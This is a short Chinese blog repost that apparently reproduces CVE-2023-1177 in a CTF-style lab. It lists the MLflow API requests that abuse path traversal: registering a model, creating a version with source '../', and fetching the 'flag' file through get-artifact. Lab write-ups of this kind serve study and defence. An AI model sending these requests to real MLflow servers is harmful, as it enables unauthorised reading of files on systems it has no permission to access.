当前位置: 首页 > news >正文

CVE-2023-1177

news 2026/3/26 18:03:37

CVE-2023-1177复现
image

进入网站
image

使用bp抓包,构造poc

POST /ajax-api/2.0/mlflow/registered-models/create
Content-Type: application/json{"name": "testfile"}

image

构造要查看的文件的poc

POST /ajax-api/2.0/mlflow/model-versions/create
Content-Type: application/json{"name": "testfile", "source": "../"}

image

查看flag/model-versions/get-artifact?path=flag&name=testfile&version=1
其中path就是你要查看的文件,name就是你构造的文件路径
image

http://www.jsqmd.com/news/383538/

相关文章:

  • RePKG完全攻略:从入门到精通的7个实战技巧
  • 游戏修改工具:零基础也能玩转的独立游戏定制神器
  • COMTool故障排除指南:参数加载失败的全方位解决策略
  • 微博图片批量下载工具:从零开始的公开图片获取实战攻略
  • 2026年初佛山闭式塔空冷器优质供应商深度解析 - 2026年企业推荐榜
  • 2026年国土空间规划调整技术服务市场分析与公司推荐 - 2026年企业推荐榜
  • 2026年Q1武汉眼镜门店可靠度深度测评与选购指南 - 2026年企业推荐榜
  • RePKG高效资源处理全攻略:从Wallpaper Engine素材提取到TEX格式转换
  • Windows效率革命:7大场景的PowerToys生产力提升实战指南
  • 3个核心价值:Beyond Compare 5密钥生成完全指南
  • 2026年凤阳家装公司选择指南:六大维度深度解析 - 2026年企业推荐榜
  • 优化魔兽争霸3性能:从卡顿到流畅的完整解决方案
  • 颠覆式视频防盗革新:用downkyi打造动态水印防护体系
  • 3步实现窗口高效管理:让你的工作效率提升300%
  • 解决GB级JSON解析难题的创新方案:HugeJsonViewer如何实现高效内存管理
  • 智能大麦抢票助手:高效解决购票难题的技术方案
  • 基于Spring Boot的名家字画鉴赏展示系统的设计与实现-计算机毕设 附源码 03235深度解析:原理、实战与踩坑记录
  • Bili2text:视频内容高效提取工具的技术实现与应用指南
  • RePKG:革新性Wallpaper Engine资源处理工具深度解析
  • 3倍效率提升,让游戏体验更智能:更好的鸣潮智能辅助工具的创新实践
  • 解锁旧Mac潜力:3大核心技术让你的iMac重获新生
  • 2026年陕西土地报批技术服务商专业评测与选型指南 - 2026年企业推荐榜
  • 网页视频无法下载?猫抓资源嗅探工具带来革新性媒体获取体验
  • 2026年小麦除草剂工厂甄选指南:聚焦三大实力厂商 - 2026年企业推荐榜
  • 魔兽争霸3性能优化实战指南:从卡顿到高帧率的开源解决方案
  • RePKG完全掌握指南:从场景应用到效率提升
  • 在 OpenCode 中使用 HexStrike 进行自动化渗透
  • 如何用MelonLoader打造Unity游戏个性化体验?从安装到精通的完整指南
  • Java SpringBoot+Vue3+MyBatis 毕业就业信息管理系统系统源码|前后端分离+MySQL数据库
  • Better-Genshin-Impact自动狗粮脚本语法错误解决指南